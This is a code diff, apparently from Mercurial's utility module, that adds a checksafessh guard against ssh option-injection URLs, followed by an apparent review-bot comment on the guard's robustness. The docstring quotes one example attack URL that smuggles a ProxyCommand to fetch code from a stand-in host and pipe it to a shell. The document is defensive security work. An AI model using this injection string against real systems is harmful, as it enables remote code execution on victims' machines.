2877 return path and path[1:2] == ':' and path[0:1].isalpha() |
2877 return path and path[1:2] == ':' and path[0:1].isalpha() |
2878 |
2878 |
2879 def urllocalpath(path): |
2879 def urllocalpath(path): |
2880 return url(path, parsequery=False, parsefragment=False).localpath() |
2880 return url(path, parsequery=False, parsefragment=False).localpath() |
2881 |
2881 |
|
2882 def checksafessh(path): |
|
2883 """check if a path / url is a potentially unsafe ssh exploit (SEC) |
|
2884 |
|
2885 This is a sanity check for ssh urls. ssh will parse the first item as |
|
2886 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. |
|
2887 Let's prevent these potentially exploited urls entirely and warn the |
|
2888 user. |
|
2889 |
|
2890 Raises an error.Abort when the url is unsafe. |
|
2891 """ |
|
2892 path = urlreq.unquote(path) |
|
2893 if path.startswith('ssh://-') or '|' in path: |
|
2894 raise error.Abort(_('potentially unsafe url: %r') % |
|
2895 (path,)) |
|
2896 |
2882 def hidepassword(u): |
2897 def hidepassword(u): |
2883 '''hide user credential in a url string''' |
2898 '''hide user credential in a url string''' |
2884 u = url(u) |
2899 u = url(u) |
2885 if u.passwd: |
2900 if u.passwd: |
2886 u.passwd = '***' |
2901 u.passwd = '***' |
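Review bot: The guard in `checksafessh` (new lines 2892-2895) tests only the literal lowercase prefix `ssh://-` on the string after one `unquote` pass, so it is not tied to the host that the URL parser will later hand to ssh. Any other scheme spelling or alias that ends up invoking ssh (none is visible in this hunk) would pass unchecked. Checking the parsed components would be more robust, for example `u = url(path)` followed by `if u.scheme == 'ssh' and (u.host or '').startswith('-'):`. Separately, `'|' in path` applies to every argument, so if callers also pass non-ssh values, as the "path / url" docstring suggests, a local path or http URL containing `|` would abort as well. I would scope that test to ssh URLs and add a regression test for the percent-encoded leading `-`, which is the case the `unquote` call exists for.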